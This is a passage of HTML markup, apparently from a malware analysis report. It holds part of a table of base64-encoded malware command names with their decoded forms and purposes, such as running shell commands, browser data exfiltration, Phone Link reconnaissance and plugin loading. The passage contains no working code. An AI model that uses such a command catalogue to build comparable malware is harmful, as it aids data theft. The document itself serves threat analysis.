-webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">UnVuU2hlbGw=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1875573313" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{196}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">RunShell</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1726274946" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{203}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Execute shell command</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="7" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="2425548" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{211}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">QnJvd3NlclNlYXJjaA==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1666104425" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{218}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">BrowserSearch</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1549215773" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{225}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Browser data<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">exfiltration</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="8" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="133218572" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{235}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">R2V0V2lkZ2V0TG9n</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1343441575" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{242}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">GetWidgetLog</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="202114822" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{249}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Phone Link recon logs and data<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">exfiltration</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="9" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="967884309" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{4}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">cGx1Z2lu</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="161224148" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{11}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">plugin</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1026302340" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{18}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Load<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">p</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">lugin</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="10" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1404279304" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{30}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">c2F2ZVBsdWdpbg==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1647099914" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{37}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">savePlugin</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1682608974" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{44}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Save<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 